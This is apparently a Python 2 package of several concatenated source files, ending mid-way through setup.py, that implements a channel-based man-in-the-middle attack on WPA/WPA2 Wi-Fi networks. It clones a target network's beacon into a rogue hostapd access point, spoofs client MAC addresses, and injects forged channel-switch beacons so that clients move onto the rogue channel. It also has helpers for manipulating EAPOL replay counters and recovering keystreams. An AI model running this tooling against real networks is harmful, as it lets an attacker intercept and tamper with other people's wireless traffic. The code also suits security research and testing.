'''
This module is responsible for creating sockets on interfaces, and for manipulating packets to et informations from them. 4 constants are responsible for return the type code for a specific IEEE 802.11 element:
  IEEE_TLV_TYPE_SSID
  IEEE_TLV_TYPE_CHANNEL
  IEEE_TLV_TYPE_RSN
  IEEE_TLV_TYPE_CSA
  IEEE_TLV_TYPE_VENDOR

4 constants are binary numbers that represents the bit flag position for a RadioTap element:
  IEEE80211_RADIOTAP_RATE = (1 << 2)
  IEEE80211_RADIOTAP_CHANNEL = (1 << 3)
  IEEE80211_RADIOTAP_TX_FLAGS = (1 << 15)
  IEEE80211_RADIOTAP_DATA_RETRIES = (1 << 17)
'''
import logging
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
from scapy.all import *
from log_messages import *
import socket, struct, subprocess

IEEE_TLV_TYPE_SSID    = 0
IEEE_TLV_TYPE_CHANNEL = 3
IEEE_TLV_TYPE_RSN     = 48
IEEE_TLV_TYPE_CSA     = 37
IEEE_TLV_TYPE_VENDOR  = 221

IEEE80211_RADIOTAP_RATE = (1 << 2)
IEEE80211_RADIOTAP_CHANNEL = (1 << 3)
IEEE80211_RADIOTAP_TX_FLAGS = (1 << 15)
IEEE80211_RADIOTAP_DATA_RETRIES = (1 << 17)

class MitmSocket(L2Socket):
	'''
    Module: packet_processing
    ===

    Descripion: open a new scoket on iface interface

    Arguments:
      dumpfile: pcap file to write captured and sent packets
      strict_echo_test: accept echoed injected packets
      iface: the interface on which to create the socket
      type: the type of protocol accepted by the socket
    '''
	def __init__(self, dumpfile=None, strict_echo_test=False, **kwargs):
		super(MitmSocket, self).__init__(**kwargs)
		self.pcap = None
		if dumpfile:
			self.pcap = PcapWriter("%s.%s.pcap" % (dumpfile, self.iface), append=False, sync=True)
		self.strict_echo_test = strict_echo_test

	def set_channel(self, channel):
		'''
		Module: packet_processing
		===
		Class: MitmSocket
		---
		Description: configure a new channel for the interface

		Arguments:
		  channel: number of the new channel
		'''
		subprocess.check_output(["iw", self.iface, "set", "channel", str(channel)])

	def attach_filter(self, bpf):
		'''
		Module: packet_processing
		===
		Class: MitmSocket
		---

		Description: creates a packet filter for the interface

		Arguments:
		  bpf: string containing filter rules
		'''
		log(DEBUG, "Attaching filter to %s: <%s>" % (self.iface, bpf))
		attach_filter(self.ins, bpf, self.iface)

	def send(self, p):
		'''
        Module: packet_processing
        ===
        Class: MitmSocket
        ---

		Description: inject new packet on network

		Arguments:
		  p: packet to send
		'''
		# Hack: set the More Data flag so we can detect injected frames
		p[Dot11].FCfield |= 0x20
		L2Socket.send(self, RadioTap()/p)
		if self.pcap: self.pcap.write(RadioTap()/p)
		log(DEBUG, "%s: Injected frame %s" % (self.iface, dot11_to_str(p)))

	def _strip_fcs(self, p):
		'''
		Module: packet_processing
		===
		Class: MitmSocket
		---

		Description: remove the FCS from the packet, if it's present

		Arguments:
		  p: packet from which to remove the FCS
		'''
		# Scapy can't handle FCS field automatically
		if p[RadioTap].present & 2 != 0:
			rawframe = str(p[RadioTap])
			pos = 8
			while ord(rawframe[pos - 1]) & 0x80 != 0: pos += 4
		
			# If the TSFT field is present, it must be 8-bytes aligned
			if p[RadioTap].present & 1 != 0:
				pos += (8 - (pos % 8))
				pos += 8

			# Remove FCS if present
			if ord(rawframe[pos]) & 0x10 != 0:
				return Dot11(str(p[Dot11])[:-4])

		return p[Dot11]

	def recv(self, x=MTU):
		'''
		Module: packet_processing
		===
		Class: MitmSocket
		---
		
		Description: listen to 802.11 packets
		
		Obs.: it has some rules to reject echoed injected packets
		'''
		p = L2Socket.recv(self, x)
		if p == None or not Dot11 in p: return None
		if self.pcap: self.pcap.write(p)

		# Don't care about control frames
		if p.type == 1:
			log(ALL, "%s: ignoring control frame %s" % (self.iface, dot11_to_str(p)))
			return None

		# 1. Radiotap monitor mode header is defined in ieee80211_add_tx_radiotap_header: TX_FLAGS, DATA_RETRIES, [RATE, MCS, VHT, ]
		# 2. Radiotap header for normal received frames is defined in ieee80211_add_rx_radiotap_header: FLAGS, CHANNEL, RX_FLAGS, [...]
		# 3. Beacons generated by hostapd and recieved on virtual interface: TX_FLAGS, DATA_RETRIES
		#
		# Conclusion: if channel flag is not present, but rate flag is included, then this could be an echoed injected frame.
		# Warning: this check fails to detect injected frames captured by the other interface (due to proximity of transmittors and capture effect)
		radiotap_possible_injection = (p[RadioTap].present & IEEE80211_RADIOTAP_CHANNEL == 0) and not (p[RadioTap].present & IEEE80211_RADIOTAP_RATE == 0)

		# Hack: ignore frames that we just injected and are echoed back by the kernel. Note that the More Data flag also
		#	allows us to detect cross-channel frames (received due to proximity of transmissors on different channel)
		if p[Dot11].FCfield & 0x20 != 0 and (not self.strict_echo_test or self.radiotap_possible_injection):
			log(DEBUG, "%s: ignoring echoed frame %s (0x%02X, present=%08X, strict=%d)" % (self.iface, dot11_to_str(p), p[Dot11].FCfield, p[RadioTap].present, radiotap_possible_injection))
			return None
		else:
			log(ALL, "%s: Received frame: %s" % (self.iface, dot11_to_str(p)))

		# Strip the FCS if present, and drop the RadioTap header
		return self._strip_fcs(p)

	def close(self):
		'''
		Module: packet_processing
		===
		Class: MitmSocket
		---
		Description: close the socket connection and the pcap file
		'''
		if self.pcap: self.pcap.close()
		super(MitmSocket, self).close()

def call_macchanger(iface, macaddr):
	'''
	Module: packet_processing
	===
	Description: it calls the macchanger function without 'down' and 'up' operation on the interface

	Arguments:
	  iface: wifi interface
	  macaddr: MAC address
	'''
	try:
		subprocess.check_output(["macchanger", "-m", macaddr, iface])
	except subprocess.CalledProcessError, ex:
		if not "It's the same MAC!!" in ex.output:
			raise

def set_mac_address(iface, macaddr):
	'''
	Module: packet_processing
	===
	Description: set the macaddress of iface to macaddr

	Arguments:
	  iface: wifi interface
	  macaddr: MAC address
	'''
	subprocess.check_output(["ifconfig", iface, "down"])
	call_macchanger(iface, macaddr)
	subprocess.check_output(["ifconfig", iface, "up"])

def set_monitor_ack_address(iface, macaddr, sta_suffix=None):
	"""Add a virtual STA interface for ACK generation. This assumes nothing takes control of this
		 interface, meaning it remains on the current channel."""
	sta_iface = iface + ("sta" if sta_suffix is None else sta_suffix)
	subprocess.call(["iw", sta_iface, "del"], stdout=subprocess.PIPE, stdin=subprocess.PIPE)
	subprocess.check_output(["iw", iface, "interface", "add", sta_iface, "type", "managed"])
	call_macchanger(sta_iface, macaddr)
	subprocess.check_output(["ifconfig", sta_iface, "up"])

def xorstr(lhs, rhs):
	'''
	Module: packet_processing
	===
	Description: execute the XOR operation between a choosen plaintext and a ciphertext to obtain a keystream

	Arguments:
	  lhs: plaintext
	  rhs: ciphertext
	'''
	return "".join([chr(ord(lb) ^ ord(rb)) for lb, rb in zip(lhs, rhs)])

def dot11_get_seqnum(p):
	'''
	Module: packet_processing
	===
	Description: get the sequence number from the 802.11 MAC header

	Arguments:
	  p: packet from which to obtain the sequence number
	'''
	return p[Dot11].SC >> 4

def dot11_get_iv(p):
	'''
	Module: packet_processing
	===
	Description: obtain the IV value from a TKIP or CCMP packet

	Arguments:
	  p: packet from which to obtain the IV
	'''
	if Dot11WEP not in p:
		log(ERROR, "INTERNAL ERROR: Requested IV of plaintext frame")
		return 0

	wep = p[Dot11WEP]
	if wep.keyid & 32:
		return ord(wep.iv[0]) + (ord(wep.iv[1]) << 8) + (struct.unpack("<I", wep.wepdata[:4])[0] << 16)
	else:
		return ord(wep.iv[0]) + (ord(wep.iv[1]) << 8) + (ord(wep.iv[2]) << 16)

def dot11_get_tid(p):
	'''
	Module: packet_processing
	===
	Descpriton: if it's present, obtain the TID (Traffic ID) number from the QoS

	Arguments:
	  p: packet from which to obtain the TID
	'''
	if Dot11QoS in p:
		return ord(str(p[Dot11QoS])[0]) & 0x0F
	return 0

def dot11_is_group(p):
	'''
	Module: packet_processing
	===
	Description: determine if the packet is a broadcast packet

	Arguments:
	  p: packet
	'''
	# TODO: Detect if multicast bit is set in p.addr1
	return p.addr1 == "ff:ff:ff:ff:ff:ff"

def get_eapol_msgnum(p):
	'''
	Module: packet_processing
	===
	Description: gets the number of the EAPOL message

	Arguments:
	  p: EAPOL packet
	'''
	FLAG_PAIRWISE = 0b0000001000
	FLAG_ACK      = 0b0010000000
	FLAG_SECURE   = 0b1000000000

	if not EAPOL in p: return 0

	keyinfo = str(p[EAPOL])[5:7]
	flags = struct.unpack(">H", keyinfo)[0]
	if flags & FLAG_PAIRWISE:
		# 4-way handshake
		if flags & FLAG_ACK:
			# sent by server
			if flags & FLAG_SECURE: return 3
			else: return 1
		else:
			# sent by server
			# FIXME: use p[EAPOL.load] instead of str(p[EAPOL])
			keydatalen = struct.unpack(">H", str(p[EAPOL])[97:99])[0]
			if keydatalen == 0: return 4
			else: return 2

	return 0

def get_eapol_replaynum(p):
	'''
	Module: packet_processing
	===
	Description: get the Replay Counter from the EAPOL packet

	Argument:
	  p: EAPOL packet
	'''
	# FIXME: use p[EAPOL.load] instead of str(p[EAPOL])
	return struct.unpack(">Q", str(p[EAPOL])[9:17])[0]

def set_eapol_replaynum(p, value):
	'''
	Module: packet_processing
	===
	Description: set the Replay Counter of the EAPOL packet to value
	'''
	p[EAPOL].load = p[EAPOL].load[:5] + struct.pack(">Q", value) + p[EAPOL].load[13:]
	return p

def dot11_to_str(p):
	'''
	Module: packet_processing
	===
	Description: return the string representation of the packet

	Arguments:
	  p: 802.11 packet 
	'''
	EAP_CODE = {1: "Request"}
	EAP_TYPE = {1: "Identity"}
	DEAUTH_REASON = {1: "Unspecified", 2: "Prev_Auth_No_Longer_Valid/Timeout", 3: "STA_is_leaving", 4: "Inactivity", 6: "Unexp_Class2_Frame",
		7: "Unexp_Class3_Frame", 8: "Leaving", 15: "4-way_HS_timeout"}
	dict_or_str = lambda d, v: d.get(v, str(v))
	if p.type == 0:
		if Dot11Beacon in p:     return "Beacon(seq=%d, TSF=%d)" % (dot11_get_seqnum(p), p[Dot11Beacon].timestamp)
		if Dot11ProbeReq in p:   return "ProbeReq(seq=%d)" % dot11_get_seqnum(p)
		if Dot11ProbeResp in p:  return "ProbeResp(seq=%d)" % dot11_get_seqnum(p)
		if Dot11Auth in p:       return "Auth(seq=%d, status=%d)" % (dot11_get_seqnum(p), p[Dot11Auth].status)
		if Dot11Deauth in p:     return "Deauth(seq=%d, reason=%s)" % (dot11_get_seqnum(p), dict_or_str(DEAUTH_REASON, p[Dot11Deauth].reason))
		if Dot11AssoReq in p:    return "AssoReq(seq=%d)" % dot11_get_seqnum(p)
		if Dot11ReassoReq in p:  return "ReassoReq(seq=%d)" % dot11_get_seqnum(p)
		if Dot11AssoResp in p:   return "AssoResp(seq=%d, status=%d)" % (dot11_get_seqnum(p), p[Dot11AssoResp].status)
		if Dot11ReassoResp in p: return "ReassoResp(seq=%d, status=%d)" % (dot11_get_seqnum(p), p[Dot11ReassoResp].status)
		if Dot11Disas in p:      return "Disas(seq=%d)" % dot11_get_seqnum(p)
		if p.subtype == 13:      return "Action(seq=%d)" % dot11_get_seqnum(p)
	elif p.type == 1:
		if p.subtype ==  9:      return "BlockAck"
		if p.subtype == 11:      return "RTS"
		if p.subtype == 13:      return "Ack"
	elif p.type == 2:
		if Dot11WEP in p:        return "EncryptedData(seq=%d, IV=%d)" % (dot11_get_seqnum(p), dot11_get_iv(p))
		if p.subtype == 4:       return "Null(seq=%d, sleep=%d)" % (dot11_get_seqnum(p), p.FCfield & 0x10 != 0)
		if p.subtype == 12:      return "QoS-Null(seq=%d, sleep=%d)" % (dot11_get_seqnum(p), p.FCfield & 0x10 != 0)
		if EAPOL in p:
			if get_eapol_msgnum(p) != 0: return "EAPOL-Msg%d(seq=%d,replay=%d)" % (get_eapol_msgnum(p), dot11_get_seqnum(p), get_eapol_replaynum(p))
			elif EAP in p:       return "EAP-%s,%s(seq=%d)" % (dict_or_str(EAP_CODE, p[EAP].code), dict_or_str(EAP_TYPE, p[EAP].type), dot11_get_seqnum(p))
			else:                return repr(p)
	return repr(p)			

def construct_csa(channel, count=1):
	'''
	Module: packet_processing
	===
	Description: constructs the CSA element

	Arguments:
	  channel: the new channel
	  count: the number of counts until the station switch
	'''
	switch_mode = 1			# STA should not Tx untill switch is completed
	new_chan_num = channel	# Channel it should switch to
	switch_count = count	# Immediately make the station switch

	# Contruct the IE
	payload = struct.pack("<BBB", switch_mode, new_chan_num, switch_count)
	return Dot11Elt(ID=IEEE_TLV_TYPE_CSA, info=payload)

def append_csa(p, channel, count=1):
	'''
	Module: packet_processing
	===
	Descprition: appends the CSA element to the packet p

	Arguments:
	  p: 802.11 Beacon packet
	  channel: the new channel
	  count: the number of counts until the station switch
	'''
	p = p.copy()

	el = p[Dot11Elt]
	prevel = None
	while isinstance(el, Dot11Elt):
		prevel = el
		el = el.payload

	prevel.payload = construct_csa(channel, count)

	return p

def get_tlv_value(p, type):
	'''
	Module: packet_processing
	===
	Description: gets the value from an element of type == `type`

	Arguments:
	  p: 802.11 packet
	  type: type of the element from which to get the value
	'''
	if not Dot11Elt in p: return None
	el = p[Dot11Elt]
	while isinstance(el, Dot11Elt):
		if el.ID == type:
			return el.info
		el = el.payload
	return None


import logging
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
from scapy.all import *
import struct, time, subprocess
from wpaspy import Ctrl
from packet_processing import *
from log_messages import *

def print_rx(level, name, p, color=None, suffix=None):
	'''
	Module: mitm_code
	===

	Description: prints the packets received on terminal

	Arguments:
	  level: ALL, DEBUG, INFO, STATUS, WARNING, ERROR
	  name: descprtive name
	  p: 802.11 packet received
	
	Format of the output:
	  "%s: %s -> %s: %s%s" % (name, p.addr2, p.addr1, dot11_to_str(p), suffix)
	'''
	if p[Dot11].type == 1: return
	if color is None and (Dot11Deauth in p or Dot11Disas in p): color="orange"
	log(level, "%s: %s -> %s: %s%s" % (name, p.addr2, p.addr1, dot11_to_str(p), suffix if suffix else ""), color=color)


class MitmChannelBased():
	'''
    Module: mitm_code
    ===

	Description: Obtain the configuration of the target network, clone to a Rogue AP, configure interfaces and start a new instance of `hostapd` to obtain the MitM Channel Based
	'''
	def __init__(self, nic_real, nic_rogue_ap, nic_rogue_mon, ssid, group=False, clientmac=None, dumpfile=None):
		self.ssid = None
		self.real_channel = None
		self.group_cipher = None
		self.wpavers = 0
		self.pairwise_ciphers = set()
		self.akms = set()
		self.wmmenabled = 0
		self.capab = 0
		self.group = group

		self.nic_real_clientack = None
		self.nic_real = nic_real
		self.nic_rogue_ap = nic_rogue_ap
		self.nic_rogue_mon = nic_rogue_mon
		self.clientmac = clientmac
		self.sock_real = None
		self.sock_rogue = None
		self.dumpfile = dumpfile
		self.beacon = None
		self.ssid = ssid
		self.apmac = None
		self.netconfig = None

		self.hostapd = None
		self.hostapd_log = None

	def is_wparsn(self):
		'''
		Module: mitm_code
		===
		Class: MitmChannelBased
		---
		Description: verifies if the target network is WPA or WPA2 protected
		'''
		return not self.group_cipher is None and self.wpavers > 0 and \
			len(self.pairwise_ciphers) > 0 and len(self.akms) > 0

	# TODO: Improved parsing to handle more networks
	def parse_wparsn(self, wparsn):

		'''
		Module: mitm_code
		===
		Class: MitmChannelBased
		---
		Description: obtains information about network security configurations

		Informations obtained:
		  group_cipher
		  pairwise_ciphers
		  akms (auth key managment)
		  RSN capabilites
		'''
		self.group_cipher = ord(wparsn[5])

		num_pairwise = struct.unpack("<H", wparsn[6:8])[0]
		pos = wparsn[8:]
		for i in range(num_pairwise):
			self.pairwise_ciphers.add(ord(pos[3]))
			pos = pos[4:]

		num_akm = struct.unpack("<H", pos[:2])[0]
		pos = pos[2:]
		for i in range(num_akm):
			self.akms.add(ord(pos[3]))
			pos = pos[4:]

		if len(pos) >= 2:
			self.capab = struct.unpack("<H", pos[:2])[0]

    #TODO - Change the WMMENABLED from 0 to int(args.group)
	def from_beacon(self, p):
		'''
		Module: mitm_code
		===
		Class: MitmChannelBased
		---
		Description: obtains a beacon packet from the target network and extracts information from that to clone the Rogue AP

		Arguments:
		  p: 802.11 Beacon packet
		
		Informations extracted:
		  self.ssid = SSID
		  self.real_channel = Channel
		  self.wpavers = WPA 1 or WPA 2
		  self.group_cipher = Group Cipher
		  self.pairwise_ciphers = Pairwise Ciphers
		  self.akms = Auth Key Management (akm)
		  self.capab = RSN Capabilities
		  self.wmm enabled = WMM enabled(1) or disabled(0)
		'''
		el = p[Dot11Elt]
		while isinstance(el, Dot11Elt):
			if el.ID == IEEE_TLV_TYPE_SSID:
				self.ssid = el.info
			elif el.ID == IEEE_TLV_TYPE_CHANNEL:
				self.real_channel = ord(el.info[0])
			elif el.ID == IEEE_TLV_TYPE_RSN:
				self.parse_wparsn(el.info)
				self.wpavers |= 2
			elif el.ID == IEEE_TLV_TYPE_VENDOR and el.info[:4] == "\x00\x50\xf2\x01":
				self.parse_wparsn(el.info[4:])
				self.wpavers |= 1
			elif el.ID == IEEE_TLV_TYPE_VENDOR and el.info[:4] == "\x00\x50\xf2\x02":
				self.wmmenabled = 1

			el = el.payload

	# TODO: Check that there also isn't a real AP of this network on 
	# the returned channel (possible for large networks e.g. eduroam).
	def find_rogue_channel(self):
		'''
		Module: mitm_code
		===
		Class: MitmChannelBased
		---
		Description: find a new channel for Rogue AP operate

		Rules:
		  if real_channel >= 6, rogue_channel = 1
		  else rogue_channel = 11
		'''
		self.rogue_channel = 1 if self.real_channel >= 6 else 11

	def write_config(self, iface):
		'''
		Module: mitm_code
		===
		Class: MitmChannelBased
		---
		Description: write the configuration file for `hostapd_rogue.conf`

		Arguments:
		  iface: interface on which the Rogue AP will operate
		'''
		TEMPLATE = """
ctrl_interface=hostapd_ctrl
ctrl_interface_group=0

interface={iface}
ssid={ssid}
channel={channel}

wpa={wpaver}
wpa_key_mgmt={akms}
wpa_pairwise={pairwise}
rsn_pairwise={pairwise}
rsn_ptksa_counters={ptksa_counters}
rsn_gtksa_counters={gtksa_counters}

wmm_enabled={wmmenabled}
wmm_advertised={wmmadvertised}
hw_mode=g
auth_algs=3
wpa_passphrase=XXXXXXXX"""
		akm2str = {2: "WPA-PSK", 1: "WPA-EAP"}
		ciphers2str = {2: "TKIP", 4: "CCMP"}
		return TEMPLATE.format(
			iface = iface,
			ssid = self.ssid,
			channel = self.rogue_channel,
			wpaver = self.wpavers,
			akms = " ".join([akm2str[idx] for idx in self.akms]),
			pairwise = " ".join([ciphers2str[idx] for idx in self.pairwise_ciphers]),
			ptksa_counters = (self.capab & 0b001100) >> 2,
			gtksa_counters = (self.capab & 0b110000) >> 4,
			wmmadvertised = int(self.group),
			wmmenabled = self.wmmenabled)
	
	def create_sockets(self, strict_echo_test=False):
		'''
		Module: mitm_code
		===
		Class: MitmChannelBased
		---
		Configure the sockets on monitor interfaces:
		  self.nic_real: self.sock_real
		  self.nic_rogue_mon: self.sock_rogue
		'''
		self.sock_real  = MitmSocket(type=ETH_P_ALL, iface=self.nic_real     , dumpfile=self.dumpfile, strict_echo_test=strict_echo_test)
		self.sock_rogue = MitmSocket(type=ETH_P_ALL, iface=self.nic_rogue_mon, dumpfile=self.dumpfile, strict_echo_test=strict_echo_test)

	def find_beacon(self, ssid):
		'''
		Module: mitm_code
		===
		Class: MitmChannelBased
		---
		Description: search for a beacon sent by the target network. First, it searchs on the current channel, if it doesn't found, it starts to search on the other channels.

		Arguments:
		  SSID - the name of the target network

		When a beacon is found, some actions occur:
		  the actual_channel gets the channel set in the beacon
		  the sock_real is set to the actual_channel
		  the beacon is stored in the self.beacon variable
		  the source address is stored in the self.apmac variable
		'''
		ps = sniff(count=1, timeout=0.3, lfilter=lambda p: Dot11Beacon in p and get_tlv_value(p, IEEE_TLV_TYPE_SSID) == ssid, opened_socket=self.sock_real)
		if ps is None or len(ps) < 1:
			log(STATUS, "Searching for target network on other channels")
			for chan in [1, 6, 11, 3, 8, 2, 7, 4, 10, 5, 9, 12, 13]:
				self.sock_real.set_channel(chan)
				log(DEBUG, "Listening on channel %d" % chan)
				ps = sniff(count=1, timeout=0.3, lfilter=lambda p: Dot11Beacon in p and get_tlv_value(p, IEEE_TLV_TYPE_SSID) == ssid, opened_socket=self.sock_real)
				if ps and len(ps) >= 1: break

		if ps and len(ps) >= 1:
			actual_chan = ord(get_tlv_value(ps[0], IEEE_TLV_TYPE_CHANNEL))
			self.sock_real.set_channel(actual_chan)
			self.beacon = ps[0]
			self.apmac = self.beacon.addr2
	
		if self.beacon is None:
			log(ERROR, "No beacon received of network <%s>. Is monitor mode working? Did you enter the correct SSID?" % self.ssid)
			exit(1)

	def configure_interfaces(self):

		'''
		Module: mitm_code
		===
		Class: MitmChannelBased
		---
		Description: configure NIC interfaces to work with MitM Attack

		Interfaces Configured:
		  Real Channel
		    self.nic_real - type monitor
		    self.nic_real + "sta1" - type managed
		  
		  Rogue Channel
		    self.nic_rogue_ap - type managed
		    self.nic_rogue_ap + "mon" - type monior
		'''
		# 0. Warn about common mistakes
		log(STATUS, "Note: remember to disable Wi-Fi in your network manager so it doesn't interfere with this script")
		# This happens when targetting a specific client: both interfaces will ACK frames from each other due to the capture
		# effect, meaning certain frames will not reach the rogue AP or the client. As a result, the client will disconnect.
		log(STATUS, "Note: keep >1 meter between both interfaces. Else packet delivery is unreliable & target may disconnect")

		# 1. Remove unused virtual interfaces
		subprocess.call(["iw", self.nic_real + "sta1", "del"], stdout=subprocess.PIPE, stdin=subprocess.PIPE)
		if self.nic_rogue_mon is None:
			subprocess.call(["iw", self.nic_rogue_ap + "mon", "del"], stdout=subprocess.PIPE, stdin=subprocess.PIPE)

		# 2. Configure monitor mode on interfaces
		subprocess.check_output(["ifconfig", self.nic_real, "down"])
		subprocess.check_output(["iw", self.nic_real, "set", "type", "monitor"])
		if self.nic_rogue_mon is None:
			self.nic_rogue_mon = self.nic_rogue_ap + "mon"
			subprocess.check_output(["iw", self.nic_rogue_ap, "interface", "add", self.nic_rogue_mon, "type", "monitor"])
			# Some kernels (Debian jessie - 3.16.0-4-amd64) don't properly add the monitor interface. The following ugly
			# sequence of commands to assure the virtual interface is registered as a 802.11 monitor interface.
			subprocess.check_output(["ifconfig", self.nic_rogue_mon, "up"])
			time.sleep(0.2)
			subprocess.check_output(["ifconfig", self.nic_rogue_mon, "down"])
			subprocess.check_output(["iw", self.nic_rogue_mon, "set", "type", "monitor"])
			subprocess.check_output(["ifconfig", self.nic_rogue_mon, "up"])


		# 3. Configure interface on real channel to ACK frames
		if self.clientmac:
				self.nic_real_clientack = self.nic_real + "sta1"
				subprocess.check_output(["iw", self.nic_real, "interface", "add", self.nic_real_clientack, "type", "managed"])
				call_macchanger(self.nic_real_clientack, self.clientmac)
		else:
			# Note: some APs require handshake messages to be ACKed before proceeding (e.g. Broadcom waits for ACK on Msg1)
			log(WARNING, "WARNING: Targeting ALL clients is not fully supported! Please provide a specific target using --target.")
			# Sleep for a second to make this warning very explicit
			time.sleep(1)

		# 4. Finally put the interfaces up
		subprocess.check_output(["ifconfig", self.nic_real, "up"])
		subprocess.check_output(["ifconfig", self.nic_rogue_mon, "up"])

	def send_csa_beacon(self, numbeacons=1, newchannel=1, target=None, silent=False):
		'''
		Module: mitm_code
		===
		Class: MitmChannelBased
		---
		Description: it sends `numbeacons` pairs of csa_beacon packets on the network. It takes the beacon sent by the target network and append the CSA element to it. The packet is sent througth the Real Socket.

		Arguments:
		  numbeacons: number of pairs of csa_beacons to send
		  target: specify a client MAC Address, if necessary
		  silent: if True, the log message is not displayed
		  newchannel: channel to switch
		'''

		beacon = self.beacon.copy()
		if target: beacon.addr1 = target

		for i in range(numbeacons):
			# Note: Intel firmware requires first receiving a CSA beacon with a count of 2 or higher,
			# followed by one with a value of 1. When starting with 1 it errors out.
			csabeacon = append_csa(beacon, newchannel, 2)
			self.sock_real.send(csabeacon)

			csabeacon = append_csa(beacon, newchannel, 1)
			self.sock_real.send(csabeacon)

		if not silent: log(STATUS, "Injected %d CSA beacon pairs (moving stations to channel %d)" % (numbeacons, newchannel), color="green")	
	
	def init_hostapd(self):
		'''
		Module: mitm_code
		===
		Class: MitmChannelBased
		---
		Description: initiate a `hostapd` instance on `nic_rogue_ap` interface
		'''
		with open("hostapd_rogue.conf", "w") as fp:
			fp.write(self.write_config(self.nic_rogue_ap))
		self.hostapd = subprocess.Popen(["../hostapd/hostapd", "hostapd_rogue.conf", "-dd", "-K"], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
		self.hostapd_log = open("hostapd_rogue.log", "w")
		log(STATUS, "Giving the rogue hostapd one second to initialize ...")
		time.sleep(1)

		self.hostapd_ctrl = Ctrl("hostapd_ctrl/" + self.nic_rogue_ap)
		self.hostapd_ctrl.attach()
	
	def hostapd_rx_mgmt(self, p):
		'''
		Module: mitm_code
		===
		Class: MitmChannelBased
		---
		Description: manage packets sent to hostapd instance

		Arguments:
		  p: 802.11 packet
		'''
		log(DEBUG, "Sent frame to hostapd: %s" % dot11_to_str(p))
		self.hostapd_ctrl.request("RX_MGMT " + str(p[Dot11]).encode("hex"))

	def hostapd_add_sta(self, macaddr):
		'''
		Module: mitm_code
		===
		Class: MitmChannelBased
		---
		Description: forward authentication packet to Rogue AP sent by the client

		Arguments:
		  macaddr: the MAC address of the client to register
		'''
		log(DEBUG, "Forwarding auth to rouge AP to register client", showtime=False)
		self.hostapd_rx_mgmt(Dot11(addr1=self.apmac, addr2=macaddr, addr3=self.apmac)/Dot11Auth(seqnum=1))

	def handle_hostapd_out(self):
		# hostapd always prints lines so this should not block
		line = self.hostapd.stdout.readline()
		if line == "":
			log(ERROR, "Rogue hostapd instances unexpectedly closed")
			quit(1)

		if line.startswith(">>>> "):
			log(STATUS, "Rogue hostapd: " + line[5:].strip())
		elif line.startswith(">>> "):
			log(DEBUG, "Rogue hostapd: " + line[4:].strip())
		# This is a bit hacky but very usefull for quick debugging
		elif "fc=0xc0" in line:
			log(WARNING, "Rogue hostapd: " + line.strip())
		elif "sta_remove" in line or "Add STA" in line or "disassoc cb" in line or "disassocation: STA" in line:
			log(DEBUG, "Rogue hostapd: " + line.strip())
		else:
			log(ALL, "Rogue hostapd: " + line.strip())

		self.hostapd_log.write(datetime.now().strftime('[%H:%M:%S] ') + line)


from datetime import datetime

ALL, DEBUG, INFO, STATUS, WARNING, ERROR = range(6)
COLORCODES = { "gray"  : "\033[0;37m",
							 "green" : "\033[0;32m",
							 "orange": "\033[0;33m",
							 "red"   : "\033[0;31m" }

global_log_level = INFO
def log(level, msg, color=None, showtime=True):
	'''
  	Description: logging messages to the terminal output

    Arguments:
      level: ALL, DEBUG, INFO, STATUS, WARNING, ERROR
      msg: the message string to log
      color: the color of the message to display
      showtime: whether to show or not the current time
	'''
	if level < global_log_level: return
	if level == DEBUG   and color is None: color="gray"
	if level == WARNING and color is None: color="orange"
	if level == ERROR   and color is None: color="red"
	print (datetime.now().strftime('[%H:%M:%S] ') if showtime else " "*11) + COLORCODES.get(color, "") + msg + "\033[1;0m"


#!/usr/bin/python
#
# wpa_supplicant/hostapd control interface using Python
# Copyright (c) 2013, Jouni Malinen <j@w1.fi>
#
# This software may be distributed under the terms of the BSD license.
# See README for more details.

import os
import stat
import socket
import select

counter = 0

class Ctrl:
    def __init__(self, path, port=9877):
        global counter
        self.started = False
        self.attached = False
        self.path = path
        self.port = port

        try:
            mode = os.stat(path).st_mode
            if stat.S_ISSOCK(mode):
                self.udp = False
            else:
                self.udp = True
        except:
            self.udp = True

        if not self.udp:
            self.s = socket.socket(socket.AF_UNIX, socket.SOCK_DGRAM)
            self.dest = path
            self.local = "/tmp/wpa_ctrl_" + str(os.getpid()) + '-' + str(counter)
            counter += 1
            self.s.bind(self.local)
            try:
                self.s.connect(self.dest)
            except Exception, e:
                self.s.close()
                os.unlink(self.local)
                raise
        else:
            try:
                self.s = None
                ai_list = socket.getaddrinfo(path, port, socket.AF_INET,
                                             socket.SOCK_DGRAM)
                for af, socktype, proto, cn, sockaddr in ai_list:
                    self.sockaddr = sockaddr
                    break
                self.s = socket.socket(af, socktype)
                self.s.settimeout(5)
                self.s.sendto("GET_COOKIE", sockaddr)
                reply, server = self.s.recvfrom(4096)
                self.cookie = reply
                self.port = port
            except:
                print "connect exception ", path, str(port)
                if self.s != None:
                    self.s.close()
                raise
        self.started = True

    def __del__(self):
        self.close()

    def close(self):
        if self.attached:
            try:
                self.detach()
            except Exception, e:
                # Need to ignore this allow the socket to be closed
                self.attached = False
                pass
        if self.started:
            self.s.close()
            if not self.udp:
                os.unlink(self.local)
            self.started = False

    def request(self, cmd, timeout=10):
        if self.udp:
            self.s.sendto(self.cookie + cmd, self.sockaddr)
        else:
            self.s.send(cmd)
        [r, w, e] = select.select([self.s], [], [], timeout)
        if r:
            return self.s.recv(4096)
        raise Exception("Timeout on waiting response")

    def attach(self):
        if self.attached:
            return None
        res = self.request("ATTACH")
        if "OK" in res:
            self.attached = True
            return None
        raise Exception("ATTACH failed")

    def detach(self):
        if not self.attached:
            return None
        while self.pending():
            ev = self.recv()
        res = self.request("DETACH")
        if "FAIL" not in res:
            self.attached = False
            return None
        raise Exception("DETACH failed")

    def terminate(self):
        if self.attached:
            try:
                self.detach()
            except Exception, e:
                # Need to ignore this to allow the socket to be closed
                self.attached = False
        self.request("TERMINATE")
        self.close()

    def pending(self, timeout=0):
        [r, w, e] = select.select([self.s], [], [], timeout)
        if r:
            return True
        return False

    def recv(self):
        res = self.s.recv(4096)
        return res



import setuptools

with open("README.md" ,"r") as fh:
    long_description = fh.read()

setuptools.setup(
    name="mitm_channel_based",
    version="0.0.4",
    author="Lucas Woody",
    author_email="loc.unb@gmail.com",
    description="This package enable to use the computer as a Rogue AP in a MitM Channel-Based attack",
    long_description = long_description,
    long_description_content_type="text/markdown",
    url="https://github.com/lucascouto/mitm-channel-based-package",
    packages=setuptools.find_packages(),
    install_requires=[
        'scapy',
    ],
    classifiers=(
        "Programming Language :: Python :: 2",
